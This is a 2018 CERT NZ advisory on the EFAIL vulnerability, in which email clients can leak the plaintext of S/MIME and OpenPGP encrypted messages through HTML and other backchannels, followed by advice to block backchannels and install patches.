7:30am, 15 May 2018
TLP Rating:
S/MIME and OpenPGP email client vulnerability
UPDATED: 10.20am, minor wording clarification. We originally referred to S/MIME and OpenPGP protocol vulnerabilities. The update clarifies the vulnerability also affects mail clients and the way they handle and display S/MIME and OpenPGP encrypted messages.
CERT NZ is aware of a new vulnerability in email clients and their use of OpenPGP and S/MIME, which are two major standards for providing end-to-end encryption for emails.
This attack can be performed on an encrypted email that an attacker has collected, including emails that have been sent a while ago.
CERT NZ is not aware of any active attacks. However, we strongly recommend you:
- block all backchannels used in your email clients
- stay up-to-date with patches from your email client and encryption plugins. Email clients may release a patch to fix this vulnerability once the S/MIME and OpenPGP standards are updated.
What's happening
Systems affected
Email clients that display emails encrypted with S/MIME or OpenPGP standards.
Exploiting this vulnerability requires the email client to allow backchannels, such as HTML, CSS, or x509 requests.
All messages that have been sent using S/MIME or OpenPGP standards may be at risk. It relies on an attacker collecting a copy of the encrypted email. There is no way to confirm if these emails have been collected or by whom.
What this means
The plaintext content of encrypted emails can be leaked by email clients.
How the vulnerability could be exploited:
- The attacker collects encrypted emails. This can be collected in multiple ways, such as through a man-in-the-middle attack or by accessing the SMTP server.
- The attacker manipulates the email and uses specific attack techniques in order to inject malicious messages into the encrypted email, and remove encryption integrity checks. This message includes an exfiltration channel (for example, HTML hyperlink) that will send the decrypted plaintext to the attacker.
- The altered email is then sent to either the sender or receiver, still encrypted with their public keys. The attacker may take steps to disguide the manipulated message, and the email may contain new FROM, DATA, and SUBJECT fields in order to make the email appear unsuspicious.
- If the email is decrypted and opened in an affected mail client, and the mail client allows the backchannel to be opened, then the data is exfiltrated through the backchannel.
What to look for
How to tell if you're at risk
If you receive S/MIME or OpenPGP encrypted emails, and your mail client allows backchannels such as HTML remote resources, you are at risk of having these emails compromised.
What to do
Prevention
CERT NZ is not aware of any active attacks. However, we strongly recommend you:
- block all backchannels used in your email client and only load emails in plaintext. Backchannels include any outbound calls that are made in order to receive and render content in the email message. Research has shown vulnerable backchannels are HTML, CSS, JavaScript, and PKI (x509) requests. We recommend all backchannels are blocked as research is still developing.
- stay informed of your email client’s patch notifications. Although the OpenPGP and S/MIME standards have not been updated to fix this vulnerability, it is important to stay informed. Once the standard has been updated, email clients may release a patch to close this vulnerability.
More information
Read the details about this vulnerability at Efail.de External Link
If you require more information or further support, submit a report on our website or contact us on 0800 CERTNZ.
For media enquiries, email our media desk at certmedia@cert.govt.nz
How helpful was this page?
This site is protected by reCAPTCHA and the Google Privacy Policy External Link and Terms of Service External Link apply.